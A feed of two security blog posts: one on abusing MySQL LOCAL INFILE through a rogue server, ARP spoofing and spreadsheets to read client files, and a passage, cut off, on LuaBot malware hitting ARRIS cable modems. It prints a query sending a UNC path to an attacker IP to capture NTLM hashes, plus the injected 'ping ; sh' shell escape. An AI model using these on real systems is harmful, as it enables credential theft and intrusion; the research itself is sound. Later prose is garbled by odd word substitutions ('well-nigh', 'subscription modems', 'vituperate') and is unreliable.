w00tsec - embedded device & webapp hacking
Bernardo Rodrigues
w00tsec.blogspot.com (Posts feed, last updated 2018-09-23)

<b>Abusing MySQL LOCAL INFILE to read client files</b><br />Bernardo Rodrigues, published 2018-04-23<br /><br />
Recently, I was playing the <a href="https://ctftime.org/event/539/tasks/">VolgaCTF 2018 CTF</a> with my teammates from <a href="https://twitter.com/thegooniesctf">TheGoonies</a>&nbsp;and we came across an interesting Web challenge that we didn't manage to solve during the competition. The following day, I read the <a href="https://github.com/balsn/ctf_writeup/tree/master/20180324-volgactf#corp-monitoring-unsolved-written-by-bookgin-special-thanks-to-admin-aleksey">write-up</a>&nbsp;and learned a cool technique to attack the MySQL client directly via the&nbsp;LOAD DATA INFILE statement.<br /><br />
The "<a href="https://ctftime.org/task/5642">Corp Monitoring</a>" task consisted of a Corporate Monitoring API that would test the healthcheck of a given server by connecting and verifying if the FTP, Web and MySQL servers were up. The MySQL user for the connection was restricted and the healthcheck validation was based on a few queries including the "SHOW DATABASE" command.<br /><br />
The key to solving the challenge was to identify the "Can Use LOAD DATA LOCAL" client capability and point the API to a rogue MySQL server that would read arbitrary files from the client via LOAD DATA INFILE statements.<br /><br />
After reading about the technique, I decided to check how several libraries, clients and Web frameworks could be exploited. I also ended up writing a Bettercap module to abuse this feature in combination with MITM attacks.<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-js0uaqfam5c/Wtt2yfF3sbI/AAAAAAAAB0A/uY6pdVKBQpQfxhkRFJD5D7B1SqZL1r_sgCEwYBhgL/s1600/bettercap-mysql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1114" data-original-width="1118" height="317" src="https://2.bp.blogspot.com/-js0uaqfam5c/Wtt2yfF3sbI/AAAAAAAAB0A/uY6pdVKBQpQfxhkRFJD5D7B1SqZL1r_sgCEwYBhgL/s320/bettercap-mysql.png" width="320" /></a></div><br /><br />
<b>Previous Research</b><br /><br />
Before I start I would like to point out that this technique is not new: it's a <a href="https://dev.mysql.com/doc/refman/5.7/en/load-data.html">known and documented feature</a> of the MySQL clients. I gathered prior posts, tools and presentations and they're all written by Russians - it looks like these techniques are not very widespread outside there.<br /><br />
- <a href="https://www.slideshare.net/qqlan/database-honeypot-by-design-25195927">Database Honeypot by design</a>&nbsp;- Presentation from Yuri Goltsev (August 2013)<br />
-&nbsp;<a href="https://github.com/allyshka/Rogue-MySql-Server">Rogue-MySql-Server Tool</a>:&nbsp;MySQL fake server to read files of connected clients (September 2013)<br />
-&nbsp;<a href="http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/">MySQL connect file read</a>&nbsp;- Post from the Russian Security (April 2016)<br /><br /><br />
<b>Revisiting MySQL LOAD DATA INFILE</b><br /><br />
According to the <a href="https://dev.mysql.com/doc/internals/en/connection-phase.html">MySQL documentation</a>, the handshake connection phase performs the following tasks:<br /><br />
- Exchange the capabilities of client and server<br />
- Set up an SSL communication channel if requested<br />
- Authenticate the client against the server<br /><br />
After the successful authentication, the client sends the query and waits for the server response before actually doing something. The "Client Capabilities" packet includes an entry called "Can Use LOAD DATA LOCAL".<br /><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-ptmu6rm8b-M/WtONkG3X0AI/AAAAAAAABys/M588eb_SZGU_A9cAY2PAkohWQ_Kh8YJ_gCPcBGAYYCw/s1600/conn.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1182" data-original-width="1386" height="340" src="https://4.bp.blogspot.com/-ptmu6rm8b-M/WtONkG3X0AI/AAAAAAAABys/M588eb_SZGU_A9cAY2PAkohWQ_Kh8YJ_gCPcBGAYYCw/s400/conn.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">LOAD DATA LOCAL Set? You're gonna have a bad time.</td></tr></tbody></table><br />
This is where things start to become interesting. As long as the client enables the capability (via the --enable-local-infile flag, for example), the file will be read from the local machine running the MySQL client and transferred to the server.<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Qb9inDGJ6fo/WttrbGYF0iI/AAAAAAAABzE/-vjmgcnMz5wxXlmVWS924GGccIleZ98LwCLcBGAs/s1600/Screen%2BShot%2B2018-04-21%2Bat%2B18.48.13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1140" height="231" src="https://2.bp.blogspot.com/-Qb9inDGJ6fo/WttrbGYF0iI/AAAAAAAABzE/-vjmgcnMz5wxXlmVWS924GGccIleZ98LwCLcBGAs/s400/Screen%2BShot%2B2018-04-21%2Bat%2B18.48.13.png" width="400" /></a></div><br />
<div>One particular feature of the MySQL protocol is that the client simply doesn't keep track of the requested commands, executing the queries purely based on the server response.</div><div><br /></div>
<div>This means that a rogue MySQL server can simulate the initial handshake, wait for the SQL statement packet, ignore it and respond with a LOCAL DATA INFILE request. Cool, isn't it?<br /><br />
For successful exploitation we also need the client to make at least one query to our rogue MySQL server. Fortunately, most MySQL clients and libraries make at least one query after the handshake in order to fingerprint the platform, for example (select @@version_comment limit 1).</div><div><br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-4kwar7tMi3A/WttyYF6zOsI/AAAAAAAABzs/Byc0eQ5WMLouvdca_RnVDj3pCSGsknlIgCEwYBhgL/s1600/Screen%2BShot%2B2018-04-21%2Bat%2B18.32.18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1156" data-original-width="1600" height="287" src="https://3.bp.blogspot.com/-4kwar7tMi3A/WttyYF6zOsI/AAAAAAAABzs/Byc0eQ5WMLouvdca_RnVDj3pCSGsknlIgCEwYBhgL/s400/Screen%2BShot%2B2018-04-21%2Bat%2B18.32.18.png" width="400" /></a></div><div><br /></div><div><br /></div>
<div>Because most MySQL clients don't enforce encryption, it's quite easy to impersonate a MySQL server using tools like <a href="https://github.com/bettercap/bettercap">Bettercap</a>. They simply don't care about the integrity and authenticity of the communication.<br /><br /><br />
<b>MITM + Bettercap + Rogue MySQL Server = WIN</b><br /><br />
<a href="https://github.com/bettercap/bettercap">Bettercap</a>&nbsp;is the Swiss army knife for network attacks and monitoring. It supports&nbsp;<a href="https://github.com/bettercap/bettercap/tree/master/modules">several modules</a>&nbsp;for ARP/DNS spoofing, TCP and packet proxy etc. I had a quick look at how its modules work and hacked a simple MySQL server that will abuse the LOAD DATA LOCAL INFILE feature to read client files.<br /><br />
Firstly, I sniffed the MySQL traffic while the client connects and requests to read a LOCAL INFILE. I exported the server responses as byte arrays and specified the components in the Golang code:<br /><br />
<script src="https://gist.github.com/bmaia/14e267c984fb88f0a5282d06a7f73e27.js"></script><br />
Writing a module for Bettercap is very simple and the core of the rogue MySQL server is as follows:<br /><br />
<script src="https://gist.github.com/bmaia/adc503231ffff19a77aaf0c7abd2e895.js"></script> Here's the module in action:<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Mu67bygMnvk/Wtt4yGTQWPI/AAAAAAAAB0I/qsOQUvaBr50-pBL4Yte8FvQim-rzWc5bQCLcBGAs/s1600/bettarcapz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1278" data-original-width="1586" height="514" src="https://2.bp.blogspot.com/-Mu67bygMnvk/Wtt4yGTQWPI/AAAAAAAAB0I/qsOQUvaBr50-pBL4Yte8FvQim-rzWc5bQCLcBGAs/s640/bettarcapz.png" width="640" /></a></div><br /><br />
The module includes the following options:<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-RdtKIpaj0Fc/Wtt55BtgYiI/AAAAAAAAB0U/mKumX0OyuJsX9pAXBs2ACZups0bvlvtSwCLcBGAs/s1600/Screen%2BShot%2B2018-04-21%2Bat%2B19.49.48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="1238" height="304" src="https://3.bp.blogspot.com/-RdtKIpaj0Fc/Wtt55BtgYiI/AAAAAAAAB0U/mKumX0OyuJsX9pAXBs2ACZups0bvlvtSwCLcBGAs/s640/Screen%2BShot%2B2018-04-21%2Bat%2B19.49.48.png" width="640" /></a></div><br /><br />
It's worth mentioning that the INFILE format also supports UNC paths. If the client connecting to your rogue MySQL server is running on Windows, it's also possible to retrieve net-NTLM hashes, using the query below:<br /><br />
<div class="code">LOAD DATA LOCAL INFILE '\\\\172.16.136.153\\test' into table mysql.test FIELDS TERMINATED BY "\n";</div><br />
Here's a quick video illustrating this technique:<br /><br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/3HVW-toqfCM" width="660"></iframe><br />
If you have a privileged network position and perform DNS or ARP spoofing, you can also redirect the MySQL traffic from legitimate databases to your rogue server and read arbitrary client files.<br /><br />
As far as I know, it's not possible to simply redirect TCP traffic from Host A to Host B using Bettercap. I wrote a quick and dirty hack for <a href="https://github.com/bettercap/bettercap/blob/master/modules/tcp_proxy.go">tcp_proxy.go</a> to handle that:<br /><br />
<script src="https://gist.github.com/bmaia/73f796e970e8eb9e7cd846620bba58b4.js"></script> Here's the ARP spoofing and the MySQL LOAD DATA LOCAL INFILE in action:<br /><br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/kHR5dd0qVG4" width="660"></iframe> <br /><br />
I sent a pull request to the project with the rogue MySQL server, let's hope that <a href="https://twitter.com/evilsocket">@evilsocket</a>&nbsp;accepts it. If my pull request is accepted, I will also ask them the best way to redirect TCP traffic (maybe another module or a setting for the TCP proxy). I will update the post with the upcoming official solution.<br /><br /><br />
<b>MySQL Command-Line Clients</b></div><div><b><br /></b></div>
<div>The mysql client from Homebrew/macOS (mysql: stable 5.7.21, devel 8.0.4-rc) properly enforces the LOCAL-INFILE flag and won't let you read client files without explicitly enabling it:</div><div><br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gaHfGdLyQo8/WtttmBaFKtI/AAAAAAAABzQ/Gc0Qahd0zDQcIrMklLYs7yP0Shk7omPrQCLcBGAs/s1600/Screen%2BShot%2B2018-04-21%2Bat%2B18.57.46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1140" height="144" src="https://1.bp.blogspot.com/-gaHfGdLyQo8/WtttmBaFKtI/AAAAAAAABzQ/Gc0Qahd0zDQcIrMklLYs7yP0Shk7omPrQCLcBGAs/s640/Screen%2BShot%2B2018-04-21%2Bat%2B18.57.46.png" width="640" /></a></div><div><br /></div>
<div>For some reason, several clients like the Ubuntu default mysql-client (5.7.21-0ubuntu0.17.10.1, as of this writing) automatically set that flag during the connection:</div><div><br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-V2qEHRlfR64/WttuxjZ_BnI/AAAAAAAABzc/XJuIMthokwUw42rEg4QTqLVV7KDTYZ06gCLcBGAs/s1600/Screenshot%2Bat%2B2018-04-21%2B19-02-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="346" data-original-width="738" height="300" src="https://3.bp.blogspot.com/-V2qEHRlfR64/WttuxjZ_BnI/AAAAAAAABzc/XJuIMthokwUw42rEg4QTqLVV7KDTYZ06gCLcBGAs/s640/Screenshot%2Bat%2B2018-04-21%2B19-02-33.png" width="640" /></a></div><div><br /></div>
<div>The same happens with the Windows client bundled with MySQL Workbench; there's no need to enable the flag to read local files:</div><div><br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-YyTnG53w8Cw/WtuC1R8OgTI/AAAAAAAAB0k/lc0GNlGcRZwvLhBAA5FoayvkQcn5vOolgCLcBGAs/s1600/mysqlwin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="677" height="322" src="https://4.bp.blogspot.com/-YyTnG53w8Cw/WtuC1R8OgTI/AAAAAAAAB0k/lc0GNlGcRZwvLhBAA5FoayvkQcn5vOolgCLcBGAs/s640/mysqlwin.PNG" width="640" /></a></div><div><br /></div><div><br /></div>
<b>Abusing Web Frameworks to read server files</b><br /><br />
<div>These insecure-by-default policies also occur in several libraries, frameworks and MySQL connectors out there: most of them enable the LOCAL-INFILE flag by default. In this case, when a web user modifies a form containing a MySQL host and points it to a rogue server, they can read local files from the system.<br /><br />
This functionality is very common in monitoring/dashboard applications and framework install scripts that allow the user to set the database on the fly via the admin panel.</div><div><br /></div>
The good news here is that most web applications restrict the panels for changing MySQL settings to administrator users only. The bad news is that your admin is one XSS/CSRF/Clickjacking away from being exploited. Here's a quick overview on how some PHP frameworks can be abused:<br /><br /><br />
<ul><li><b>Joomla v3.8.7</b></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PdXG1liJH3I/WtxQbrUAoFI/AAAAAAAAB00/OsXRteDQSo00p-YQz0takv5go8vq80t4ACLcBGAs/s1600/joomla.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1069" data-original-width="1600" height="426" src="https://1.bp.blogspot.com/-PdXG1liJH3I/WtxQbrUAoFI/AAAAAAAAB00/OsXRteDQSo00p-YQz0takv5go8vq80t4ACLcBGAs/s640/joomla.png" width="640" /></a></div><br /><br />
<ul><li><b>Wordpress v4.9.5</b></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ShdPDHxNogM/WtxQy7OfU0I/AAAAAAAAB08/PBGGUOK-vw8qXMVNFCg3B7lVlgcFtG9MgCLcBGAs/s1600/wordpress.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="990" data-original-width="1600" height="394" src="https://1.bp.blogspot.com/-ShdPDHxNogM/WtxQy7OfU0I/AAAAAAAAB08/PBGGUOK-vw8qXMVNFCg3B7lVlgcFtG9MgCLcBGAs/s640/wordpress.png" width="640" /></a></div><br /><br />
<ul><li><b>Zabbix v3.4.8</b></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-VeqwvxOZAQs/WtxRA2A2AkI/AAAAAAAAB1A/jto7c-IIqz4lzOyFCOIcyWK-f_pwax6EQCLcBGAs/s1600/zabbix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1165" data-original-width="1600" height="466" src="https://1.bp.blogspot.com/-VeqwvxOZAQs/WtxRA2A2AkI/AAAAAAAAB1A/jto7c-IIqz4lzOyFCOIcyWK-f_pwax6EQCLcBGAs/s640/zabbix.png" width="640" /></a></div><div><br /></div><br /><br />
<ul><li><b>Drupal v8.5.2 </b>(Not vulnerable)</li></ul><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-ndMOXK38s7Y/WtxRGqUaboI/AAAAAAAAB1I/OR_8rePXrnoCBAnQ1TBHEfhQNq0x2b52wCLcBGAs/s1600/drupal.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1143" data-original-width="1600" height="456" src="https://1.bp.blogspot.com/-ndMOXK38s7Y/WtxRGqUaboI/AAAAAAAAB1I/OR_8rePXrnoCBAnQ1TBHEfhQNq0x2b52wCLcBGAs/s640/drupal.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Drupal was probably too busy being vulnerable to RCEs</td></tr></tbody></table><br /><br />
<b>Bonus: Abusing Excel MySQL Connector</b><br /><br />
If you have a Microsoft Office installation on your Windows machine and the&nbsp;<a href="https://dev.mysql.com/downloads/connector/net/">MySQL Connector/Net</a> is installed, it's possible to create a spreadsheet that connects to a rogue MySQL server. The connector is installed by default with the <a href="https://dev.mysql.com/downloads/installer/">Windows MySQL installer</a>&nbsp;and you probably have it if you use a tool to connect to/manage MySQL databases or if your machine is running MySQL server.<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-oubVBBd4qFc/WtyS_qeoC3I/AAAAAAAAB1s/0XLe0QwgF0kjWaWouJvu0FM52J1B0Yu4gCLcBGAs/s1600/mysql-install.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="800" height="298" src="https://3.bp.blogspot.com/-oubVBBd4qFc/WtyS_qeoC3I/AAAAAAAAB1s/0XLe0QwgF0kjWaWouJvu0FM52J1B0Yu4gCLcBGAs/s400/mysql-install.PNG" width="400" /></a></div><br />
In order to create a document that connects to a MySQL server, we need to go to the Data tab and choose New Query&gt;From Database&gt;From MySQL Database. We enter the server details, username, password, query and save the file.<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-s8TjIM2kJ9o/WtyTYKVwpGI/AAAAAAAAB10/F2o_we9KP8M1YmNBIb4yJ6IIhPKL5bIuQCLcBGAs/s1600/mysql-excel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1013" data-original-width="1022" height="395" src="https://3.bp.blogspot.com/-s8TjIM2kJ9o/WtyTYKVwpGI/AAAAAAAAB10/F2o_we9KP8M1YmNBIb4yJ6IIhPKL5bIuQCLcBGAs/s400/mysql-excel.png" width="400" /></a></div><br /><br />
If you download the document from the Internet, the receiver needs to put the document in editing mode before the remote server will be contacted. For some reason, we need to close/reopen Excel for the query to work. Also, Excel only displays the security warning the first time you open the file and stops doing so as soon as you enable the external content.<br /><br />
Here's another demo:<br /><br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/iBGbHYJAXSg" width="660"></iframe> <br /><br />
<b>Conclusion</b><br /><br />
Despite the efforts from Duo Security (they had a website AND a logo) with the <a href="https://duo.com/blog/backronym-mysql-vulnerability">BACKRONYM MySQL vulnerability</a>, not much is being done to enforce proper encryption for MySQL servers. Web applications and frameworks rarely support encryption and TLS validation for the MySQL connection. The unencrypted protocol is not secure and, given a password hash and a successful authentication handshake, one can <a href="https://github.com/cyrus-and/mysql-unsha1">successfully log in to the server</a>.<br /><br />
MySQL libraries and connectors should establish secure patterns and disable LOCAL-INFILE support by default.
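<br /><br />
A client-side guard for the protocol behaviour described above (the client never checks whether it actually issued a LOAD DATA LOCAL statement before honouring the server's LOCAL INFILE request). This is an added example, not code from the post, from Bettercap or from any MySQL driver: it parses MySQL packet framing, reads the CLIENT_LOCAL_FILES ("Can Use LOAD DATA LOCAL") bit from the HandshakeResponse41, and flags any 0xFB LOCAL INFILE request that does not follow a LOAD DATA LOCAL query. The captured exchange it walks is constructed inline, and the server greeting in it is an abbreviated stand-in.

```python
"""Client-side check for unsolicited MySQL LOCAL INFILE requests (added example)."""
import struct

# Capability bits from the MySQL client/server protocol (HandshakeResponse41).
CLIENT_LOCAL_FILES = 0x00000080   # "Can Use LOAD DATA LOCAL"
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SSL = 0x00000800

COM_QUERY = 0x03                  # first payload byte of a text query
LOCAL_INFILE_MARKER = 0xFB        # first payload byte of a server LOCAL INFILE request


def frame(seq: int, payload: bytes) -> bytes:
    """Wrap a payload in MySQL packet framing: 3-byte LE length + 1-byte sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def split_packets(stream: bytes):
    """Split a raw byte stream into (sequence_id, payload) tuples."""
    packets, pos = [], 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated packet at offset %d" % pos)
        packets.append((stream[pos + 3], payload))
        pos += 4 + length
    if pos != len(stream):
        raise ValueError("trailing bytes after last packet")
    return packets


def build_handshake_response(capabilities: int, user: bytes = b"root") -> bytes:
    """HandshakeResponse41 payload: caps(4) max_packet(4) charset(1) reserved(23) user NUL auth_len."""
    return (struct.pack("<IIB", capabilities, 16 * 1024 * 1024, 0x21)
            + b"\x00" * 23 + user + b"\x00" + b"\x00")


def handshake_response_capabilities(payload: bytes) -> int:
    """Return the 32-bit capability flags the client advertised (first 4 bytes, LE)."""
    if len(payload) < 32:
        raise ValueError("payload too short for HandshakeResponse41")
    return struct.unpack_from("<I", payload, 0)[0]


def is_load_data_local(sql: str) -> bool:
    """True for LOAD DATA [LOW_PRIORITY|CONCURRENT] LOCAL INFILE ..., the only statement
    after which a 0xFB reply from the server is legitimate."""
    tokens = sql.strip().upper().split()
    if tokens[:2] != ["LOAD", "DATA"]:
        return False
    return "LOCAL" in tokens[2:4] and "INFILE" in tokens[3:5]


def audit_exchange(exchange):
    """Walk a captured exchange, a list of ("C"|"S", raw bytes) in wire order starting at the
    server greeting.  Returns whether the client advertised CLIENT_LOCAL_FILES, plus every
    server LOCAL INFILE request split into "solicited" (preceded by a LOAD DATA LOCAL query
    from the client) and "unsolicited" (the rogue-server pattern)."""
    report = {"local_files_advertised": None, "solicited": [], "unsolicited": []}
    last_query = None
    handshake_done = False
    for direction, stream in exchange:
        for _seq, payload in split_packets(stream):
            if not payload:
                continue
            if direction == "C":
                if not handshake_done:
                    # The first client packet is the HandshakeResponse41.
                    report["local_files_advertised"] = bool(
                        handshake_response_capabilities(payload) & CLIENT_LOCAL_FILES)
                    handshake_done = True
                elif payload[0] == COM_QUERY:
                    last_query = payload[1:].decode("utf-8", "replace")
            elif handshake_done and payload[0] == LOCAL_INFILE_MARKER:
                # 0xFB is never the first byte of an OK/ERR/EOF or column-count packet, so it
                # unambiguously marks a LOCAL INFILE request; the rest of the payload is the path.
                finding = {"filename": payload[1:].decode("utf-8", "replace"), "query": last_query}
                legit = last_query is not None and is_load_data_local(last_query)
                report["solicited" if legit else "unsolicited"].append(finding)
    return report


def build_rogue_capture():
    """Constructed sample: the client advertises CLIENT_LOCAL_FILES, sends only the usual
    fingerprint query, and the server answers it with a LOCAL INFILE request for /etc/passwd."""
    greeting = b"\x0a5.7.21\x00" + b"\x00" * 20       # abbreviated stand-in for the greeting
    ok_packet = b"\x00\x00\x00\x02\x00\x00\x00"
    caps = CLIENT_PROTOCOL_41 | CLIENT_LOCAL_FILES
    return [
        ("S", frame(0, greeting)),
        ("C", frame(1, build_handshake_response(caps))),
        ("S", frame(2, ok_packet)),
        ("C", frame(0, bytes([COM_QUERY]) + b"select @@version_comment limit 1")),
        ("S", frame(1, bytes([LOCAL_INFILE_MARKER]) + b"/etc/passwd")),
    ]


if __name__ == "__main__":
    print(audit_exchange(build_rogue_capture()))
```

A client built on this rule (or a proxy applying it) simply refuses the 0xFB request when no LOAD DATA LOCAL statement preceded it, which is the check the stock clients discussed above do not perform.<br /><br />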
I really like the way the&nbsp;<a href="https://github.com/go-sql-driver/mysql">Go MySQL Driver</a>&nbsp;works: it supports LOCAL-INFILE via whitelisting and the library documentation explicitly advises that the full-length "Might be insecure!"<br /><div><br /></div><div>This full-length can moreover be longwinded in honeypots and vulnerability scanners. It should be quite interesting to pwn security tools while they scan your MySQL host. If your using register a MySQL URI handler, your system might be venal via website links.<br /><span style="text-align: center;"><br /></span><span style="text-align: center;">Another interesting way to vituperate MySQL clients is via downgrade attacks, switching to older insecure password hallmark and verifying how they behave. But this post is once too long for that...</span><br /><span style="text-align: center;"><br /></span><span style="text-align: center;">Thanks for reading!&nbsp;</span><br /><span style="text-align: center;"><br /></span></div><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0tag:blogger.com,1999:blog-3296471108082693838.post-48604607850491979102016-09-12T12:08:00.000-03:002016-12-01T18:15:55.586-02:00LuaBot: Malware targeting subscription modems<span style="font-family: inherit;">During mid-2015 I disclosed some vulnerabilities well-expressed multiple ARRIS subscription modems. 
I wrote a <a href="https://w00tsec.blogspot.com/2015/11/arris-cable-modem-has-backdoor-in.html">blogpost well-nigh ARRIS' nested backdoor</a> and detailed some of my subscription modem research during the 2015 edition from&nbsp;<a href="https://www.nullbyte-con.org/">NullByte Security Conference</a>.</span><br /><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">CERT/CC released the Vulnerability Note&nbsp;<a href="https://www.kb.cert.org/vuls/id/419568">VU#419568</a> and it got <a href="http://www.theregister.co.uk/2015/11/20/arris_modem_backdoor/">lots</a> <a href="http://news.softpedia.com/news/backdoor-within-backdoor-puts-over-600-000-arris-cable-modems-in-danger-496485.shtml">of</a> <a href="https://hardware.slashdot.org/story/15/11/21/0428215/600000-arris-cable-modems-have-backdoors-in-backdoors-researcher-claims">media</a> <a href="http://www.tomshardware.com/news/double-backdoor-arris-cable-modems,30620.html">coverage</a>. I did not provide any POC's during that time considering I was pretty sure that those vulnerabilities were hands wormable... And guess what? Someone is urgently exploiting those devices since May/2016.</span><br /><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">The malware targets&nbsp;<a href="https://www-ssl.intel.com/content/www/us/en/cable-modems/puma5-product-brief.html">Puma 5</a>&nbsp;(ARM/Big Endian) subscription modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many <a href="https://www.protectwise.com/blog/observing-large-scale-router-exploit-attempts/">common worm</a> that <a href="https://quantumfilament.co/2015/08/17/chapter-2-the-binary/">targets embedded devices</a> from <a href="https://isc.sans.edu/diary/19999">multiple architectures</a>. 
The final stage is an ARMEB version from the <a href="https://www.symantec.com/security_response/writeup.jsp?docid=2016-090915-3236-99">LuaBot Malware</a>.</span><br /><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-Wn1TgurUOU8/V5ORms_wmZI/AAAAAAAABWY/tl90mO54ZA8z_diNrUWXrrfMMiVr0KDDwCEw/s1600/ps.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="227" src="https://4.bp.blogspot.com/-Wn1TgurUOU8/V5ORms_wmZI/AAAAAAAABWY/tl90mO54ZA8z_diNrUWXrrfMMiVr0KDDwCEw/s400/ps.png" width="400" /></span></a></div><div><br />The ARMEL version from the LuaBot Malware was dissected on a <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">blogpost from Malware Must Die</a>, but this specific ARMEB was still unknown/undetected for the time being. The malware was initially sent to VirusTotal on 2016-05-26 and it still has a 0/0 detection rate.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-pTtamdU0Wrg/V9SGapor_QI/AAAAAAAABdA/i_mrqfy39PwX8sJjUm9vYBRmjCEOeLVPACLcB/s1600/vtotal.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://4.bp.blogspot.com/-pTtamdU0Wrg/V9SGapor_QI/AAAAAAAABdA/i_mrqfy39PwX8sJjUm9vYBRmjCEOeLVPACLcB/s400/vtotal.PNG" width="400" /></a></div><br /><br /></div><div><div><b><span style="font-family: inherit;">Cable Modem Security and ARRIS Backdoors</span></b></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">Before we go any further, if you want to learn well-nigh subscription modem security, grab the slides from my talk "HackingSubscriptionModems: The Later Years". 
The talk covers many aspects of the technology used to manage subscription modems, how the data is protected, how the ISPs upgrade the firmwares and so on.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><ul><li><span style="font-family: inherit;"><a href="https://github.com/bmaia/slides/raw/master/nullbyte_2015-hacking_cable_modems_the_later_years.pdf">https://github.com/bmaia/slides/raw/master/nullbyte_2015-hacking_cable_modems_the_later_years.pdf</a></span></li></ul></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">Pay special sustentation to the slide #86:</span></div><div><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JDXpkrYtVIo/V5MM7hiZjSI/AAAAAAAABV0/Jzro5XkvSG896etFaen8wy2QNXKevrMpACLcB/s1600/myths.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="260" src="https://1.bp.blogspot.com/-JDXpkrYtVIo/V5MM7hiZjSI/AAAAAAAABV0/Jzro5XkvSG896etFaen8wy2QNXKevrMpACLcB/s320/myths.PNG" width="320" /></span></a></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">I received some reports that malware creators are remotely exploiting those devices in order to dump the modem's configuration and steal private certificates. Some users moreover reported that those certificates are stuff sold for bitcoin to modem cloners all virtually the world. 
The report from <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">Malware Must Die!</a>&nbsp;also points that the LuaBot is stuff used for flooding/DDoS attacks.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;"><br /></span></div><div><b><span style="font-family: inherit;">Exploit and Initial Infection</span></b></div><div><b><span style="font-family: inherit;"><br /></span></b></div><div><span style="font-family: inherit;">Luabot malware is part of a worthier botnet targeting embedded devices from multiple architectures.Withoutverifying some infected systems, I noticed that most subscription modems were compromised by a writ injection in the restricted CLI wieldy via the ARRIS Password of The Day Backdoor.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">Telnet honeypots like the one from&nbsp;<a href="http://www.nothink.org/honeypot_telnet.php">nothink.org</a> have been logging these exploit attempts for some time.&nbsp;</span>They are logging many attempts to bruteforce the username "system" and the password "ping ; sh", but they're, in fact, commands used to escape from the restricted ARRIS telnet shell.</div><div><span style="font-family: 